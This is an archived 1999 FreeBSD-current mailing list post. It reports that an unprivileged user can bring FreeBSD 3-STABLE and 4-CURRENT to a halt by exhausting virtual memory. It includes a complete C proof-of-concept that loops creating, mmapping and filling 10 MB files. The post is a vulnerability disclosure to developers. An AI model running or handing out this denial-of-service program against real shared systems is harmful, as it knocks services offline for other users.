Date: Fri, 29 Oct 1999 13:18:53 +0300 From: Maxim Sobolev <sobomax@altavista.net> To: current@freebsd.org Subject: VM DOS attack Message-ID: <3819748D.46722BF6@altavista.net>
next in thread | raw e-mail | index | archive | help
Hi there,
Probably it is already known problem, but it seems that any unprivileged
malicious user with 15-20 MB disk quota can bring either 3-STABLE or 4-CURRENT
system to its knees using relatively simple program.
#include <sys/types.h>
#include <sys/mman.h>
#include <unistd.h>
#include <fcntl.h>
#include <errno.h>
main()
{
int fd;
int i;
int len=1024*1024*10; /*ie 10Mbytes*/
caddr_t addr;
char ttt[80];
for (i=0;;i++)
{
sprintf (ttt,"%d",i);
fd=open(ttt,O_CREAT|O_RDWR,0666);
if (fd<0)
{
printf("open error %ld\n",errno);
exit(1);
}
lseek(fd,len-1,SEEK_SET);
write(fd,"",1);
addr=mmap(0,len,PROT_READ|PROT_WRITE,MAP_SHARED,fd,0);
if (addr==MAP_FAILED)
{
printf("mmap error %ld",errno);
exit(1);
}
close(fd);
memset(addr,'x',len);
}
}
-Maxim
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-current" in the body of the message
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?3819748D.46722BF6>